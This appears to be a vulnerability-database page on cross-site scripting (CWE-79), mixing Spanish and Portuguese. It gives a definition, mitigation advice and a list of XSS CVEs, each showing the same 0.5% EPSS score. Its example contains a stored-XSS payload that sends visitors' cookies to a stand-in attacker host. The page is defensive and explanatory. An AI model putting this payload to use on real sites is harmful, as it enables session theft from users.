Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-49409CRITICALWordPress SensorPress plugin <= 1.0 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2026-67237HIGHRabbitMQ: Reflected XSS via the OAuth bootstrap JS endpointEPSS 0.5%CVE-2025-9226MEDIUMStored XSSEPSS 0.5%CVE-2024-22199CRITICALDjango Template Engine Vulnerable to XSSEPSS 0.5%CVE-2020-36828LOWDiscuzX install_function.php show_next_step cross site scriptingEPSS 0.5%CVE-2020-15855—Two cross-site scripting vulnerabilities were fixed in Bodhi 5.6.1.EPSS 0.5%CVE-2022-20969MEDIUMA vulnerability in multiple management dashboard pages of Cisco Umbrella could allow an authenticated, remote attacker to conduct a cross-siEPSS 0.5%CVE-2024-50585MEDIUMReflected Cross-Site ScriptingEPSS 0.5%CVE-2016-15035LOWDoc2k RE-Chat re_chat.js cross site scriptingEPSS 0.5%CVE-2019-25105LOWdro.pm fileman.php cross site scriptingEPSS 0.5%CVE-2023-49984MEDIUMA cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to eEPSS 0.5%CVE-2021-24431—Language Bar Flags <= 1.0.8 - CSRF to Stored XSSEPSS 0.5%CVE-2024-31973MEDIUMHitron CODA-4582 2AHKM-CODA4589 7.2.4.5.1b8 devices allow a remote attacker within Wi-Fi proximity to conduct stored XSS attacks via the 'NeEPSS 0.5%CVE-2024-2133LOWBdtask Isshue Multi Store eCommerce Shopping Cart Solution Manage Sale Page manage_invoice cross site scriptingEPSS 0.5%CVE-2025-64539CRITICALAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.5%CVE-2024-4201MEDIUMImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLabEPSS 0.5%CVE-2023-7314MEDIUMNagios XI < 5.11.3 XSS via Bandwidth ReportEPSS 0.5%CVE-2024-37297MEDIUMWooCommerce has a Cross-Site Scripting Vulnerability in checkout & registration formsEPSS 0.5%CVE-2026-77850HIGHStored XSS in AshAdmin relationship typeahead via unescaped label_field contentEPSS 0.5%CVE-2024-53262LOWUnescaped error message included on error page in SvelteKitEPSS 0.5%